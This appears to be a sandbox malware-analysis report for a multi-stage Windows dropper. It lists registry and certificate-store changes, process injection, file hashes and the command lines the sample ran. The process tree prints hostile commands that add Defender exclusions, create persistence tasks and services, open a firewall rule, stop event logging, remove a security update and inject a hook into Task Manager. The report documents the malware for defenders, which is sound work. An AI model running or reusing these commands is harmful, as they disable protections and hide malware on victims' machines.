Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [hex-encoded certificate blob omitted] C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [hex-encoded certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
N/A N/A N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\cbujigs N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1456 wrote to memory of 2160 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1456 wrote to memory of 2160 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1456 wrote to memory of 2160 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1456 wrote to memory of 2160 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1456 wrote to memory of 2160 N/A N/A C:\Windows\system32\regsvr32.exe
PID 2160 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2160 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2160 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2160 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2160 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2160 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2160 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1456 wrote to memory of 2024 N/A N/A C:\Users\Admin\AppData\Local\Temp\BFC7.exe
PID 1456 wrote to memory of 2024 N/A N/A C:\Users\Admin\AppData\Local\Temp\BFC7.exe
PID 1456 wrote to memory of 2024 N/A N/A C:\Users\Admin\AppData\Local\Temp\BFC7.exe
PID 1456 wrote to memory of 2024 N/A N/A C:\Users\Admin\AppData\Local\Temp\BFC7.exe
PID 1456 wrote to memory of 2980 N/A N/A C:\Users\Admin\AppData\Local\Temp\D339.exe
PID 1456 wrote to memory of 2980 N/A N/A C:\Users\Admin\AppData\Local\Temp\D339.exe
PID 1456 wrote to memory of 2980 N/A N/A C:\Users\Admin\AppData\Local\Temp\D339.exe
PID 1456 wrote to memory of 2980 N/A N/A C:\Users\Admin\AppData\Local\Temp\D339.exe
PID 1456 wrote to memory of 780 N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe
PID 1456 wrote to memory of 780 N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe
PID 1456 wrote to memory of 780 N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe
PID 1456 wrote to memory of 780 N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe
PID 1456 wrote to memory of 780 N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe
PID 1456 wrote to memory of 780 N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe
PID 1456 wrote to memory of 780 N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe
PID 780 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp
PID 780 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp
PID 780 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp
PID 780 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp
PID 780 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp
PID 780 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp
PID 780 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp
PID 1456 wrote to memory of 2640 N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 1456 wrote to memory of 2640 N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 1456 wrote to memory of 2640 N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 1456 wrote to memory of 2640 N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2640 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 1456 wrote to memory of 868 N/A N/A C:\Users\Admin\AppData\Local\Temp\F250.exe
PID 1456 wrote to memory of 868 N/A N/A C:\Users\Admin\AppData\Local\Temp\F250.exe
PID 1456 wrote to memory of 868 N/A N/A C:\Users\Admin\AppData\Local\Temp\F250.exe
PID 1456 wrote to memory of 868 N/A N/A C:\Users\Admin\AppData\Local\Temp\F250.exe
PID 2832 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 2832 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 2832 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 2832 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 2832 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 2832 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 2832 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 2832 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe
PID 1688 wrote to memory of 2036 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\cbujigs
PID 1688 wrote to memory of 2036 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\cbujigs
PID 1688 wrote to memory of 2036 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\cbujigs
PID 1688 wrote to memory of 2036 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\cbujigs
PID 1456 wrote to memory of 2612 N/A N/A C:\Users\Admin\AppData\Local\Temp\911F.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe

"C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe"

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\BE11.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\BE11.dll

C:\Users\Admin\AppData\Local\Temp\BFC7.exe

C:\Users\Admin\AppData\Local\Temp\BFC7.exe

C:\Users\Admin\AppData\Local\Temp\D339.exe

C:\Users\Admin\AppData\Local\Temp\D339.exe

C:\Users\Admin\AppData\Local\Temp\E2E3.exe

C:\Users\Admin\AppData\Local\Temp\E2E3.exe

C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp" /SL5="$5016C,3536428,54272,C:\Users\Admin\AppData\Local\Temp\E2E3.exe"

C:\Users\Admin\AppData\Local\Temp\E90C.exe

C:\Users\Admin\AppData\Local\Temp\E90C.exe

C:\Users\Admin\AppData\Local\Temp\E90C.exe

C:\Users\Admin\AppData\Local\Temp\E90C.exe

C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe

"C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe" -i

C:\Users\Admin\AppData\Local\Temp\F250.exe

C:\Users\Admin\AppData\Local\Temp\F250.exe

C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe

"C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe" -s

C:\Windows\system32\taskeng.exe

taskeng.exe {82D36A8A-7AB0-4EA8-BA0E-1F21D46A3595} S-1-5-21-2461186416-2307104501-1787948496-1000:MGILJUBR\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\cbujigs

C:\Users\Admin\AppData\Roaming\cbujigs

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 128

C:\Users\Admin\AppData\Local\Temp\911F.exe

C:\Users\Admin\AppData\Local\Temp\911F.exe

C:\Users\Admin\AppData\Local\Temp\A220.exe

C:\Users\Admin\AppData\Local\Temp\A220.exe

C:\Users\Admin\AppData\Local\Temp\B276.exe

C:\Users\Admin\AppData\Local\Temp\B276.exe

C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp" /SL5="$201D2,4081152,54272,C:\Users\Admin\AppData\Local\Temp\B276.exe"

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\nsjF105.tmp

C:\Users\Admin\AppData\Local\Temp\nsjF105.tmp

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240222062035.log C:\Windows\Logs\CBS\CbsPersist_20240222062035.cab

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "UTIXDCVF"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "UTIXDCVF"

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\explorer.exe

explorer.exe

Network


Files

C:\Users\Admin\AppData\Local\Temp\B276.exe

MD5 2ee28b1b8adb2bc3644a427a9b310822
SHA1 be17b359844ee67f03b1bbdbc8fc1e14e2a5e939
SHA256 b1c20cbde00a9e6f9c95811ed5403364dc489e57f8e03ed610b3d8c091949f7e
SHA512 0ab4c2133391426e6c6bc099e7c287c1b4ffe63eb4eddf2698f96495613ab902549207760a8758c2b0f8c7ff0c6312538026a83a704d7e254caa99fe38181ae4

C:\Users\Admin\AppData\Local\Temp\B276.exe

MD5 becbf6f29831e6f45ce6c5a90b0bf511
SHA1 54cf4bb03914159f6be2b98c66d4652750ecde47
SHA256 a006be7696a7a0dfe113b8b4773913f5f44db9cdd38736a49a75617cf7c8edf5
SHA512 6581a8da9501809091aa31be3ce77d0b0d8c1b6f2962c290183d4d357a73ce962a2466c777fb925ff933e57187390af633f760163a295e79b3a923085ceeb78a

C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp

MD5 b11909d5e4e08b1a6da220eca474d49f
SHA1 b42582ab65d400f3450907ddc0857092c4daa4a8
SHA256 97f2d72a0547bb1de12ce60bb94c8550574637d3b9982be7ba4ae55348eb00ff
SHA512 8e98b2ad7437da3f35adbbbe92c55b966982df33267cd9959dd6bdc36936693b38789c19624a0e6c6a816f0bfc2cf15f23bdfe1ff060f7d49ac8c0e03682efab

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 8968359e460df9992c18c113c1c17674
SHA1 1370811cb82506f311c9ea7564df9a0029bd2265
SHA256 da196e9c74d5f55018e8b34e506f8d15dafaff07ad297215139e28bc2f11f07c
SHA512 cc9ce4a2cf680d5bf9945ee00600877e4a28a940888e6e9db90b431469f2a926fb386a4cb98243d60da4ad52353088d156a6815b1335e6b9077ed04a13e9f7d3

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 d3c015d761ac4697c31779ebd67685fe
SHA1 6eda243187265592a404feca52bf612ddc66e396
SHA256 689272ab8ec16e67eb0c14f37e0928b21b3cf38e467216ed1240177d82e5d7ea
SHA512 680b8009fc1392d7269a58821b9a0f71bf93ae4b7a46f8f3c9900ab501a48fa7c882c214377d0b33b6310d6d92259dada20db8b3e6939446b013b2d668a7d7ab

\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 571e22a09868101e6810f75e21d74b49
SHA1 7ef9c86f4be2f1687fab63f27e47da54051879cc
SHA256 0c6452bc1d38884358626bd3866187a4a7608a480abfd459f848ae5bd3e8a715
SHA512 57d64a08a16176d9f62a3f5fa9ebce2c489045fdc460a0c8a114b098b228c58f4203a2af8d25a5e3f259bc0590c44f162f5bd976852f967904721b664f6e3175

C:\Users\Admin\AppData\Local\Folder To Iso 2.0\is-K4J3J.tmp

MD5 6231b452e676ade27ca0ceb3a3cf874a
SHA1 f8236dbf9fa3b2835bbb5a8d08dab3a155f310d1
SHA256 9941eee1cafffad854ab2dfd49bf6e57b181efeb4e2d731ba7a28f5ab27e91cf
SHA512 f5882a3cded0a4e498519de5679ea12a0ea275c220e318af1762855a94bdac8dc5413d1c5d1a55a7cc31cfebcf4647dcf1f653195536ce1826a3002cf01aa12c

\Users\Admin\AppData\Local\Temp\is-V3MTG.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

